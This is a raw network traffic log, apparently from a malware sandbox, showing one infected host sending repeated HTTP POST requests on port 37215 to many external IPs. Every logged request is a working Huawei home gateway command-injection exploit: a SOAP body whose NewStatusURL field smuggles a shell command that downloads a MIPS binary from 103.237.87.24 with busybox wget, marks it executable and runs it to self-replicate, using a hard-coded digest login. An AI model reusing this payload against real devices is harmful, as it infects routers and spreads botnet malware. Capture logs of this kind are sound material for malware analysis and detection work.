                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1768192.168.2.1337144159.191.38.23937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537645102 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1769192.168.2.1354830197.120.182.19337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537651062 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1770192.168.2.1337146190.225.204.2537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537719965 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1771192.168.2.135600841.229.9.7137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537748098 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1772192.168.2.1338358197.161.210.4537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537748098 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1773192.168.2.135744841.20.104.1937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537749052 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1774192.168.2.136052892.26.141.5337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537761927 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1775192.168.2.1336134197.160.141.4537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537770033 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1776192.168.2.134256441.61.237.10037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537776947 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1777192.168.2.135332241.184.55.23837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537977934 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
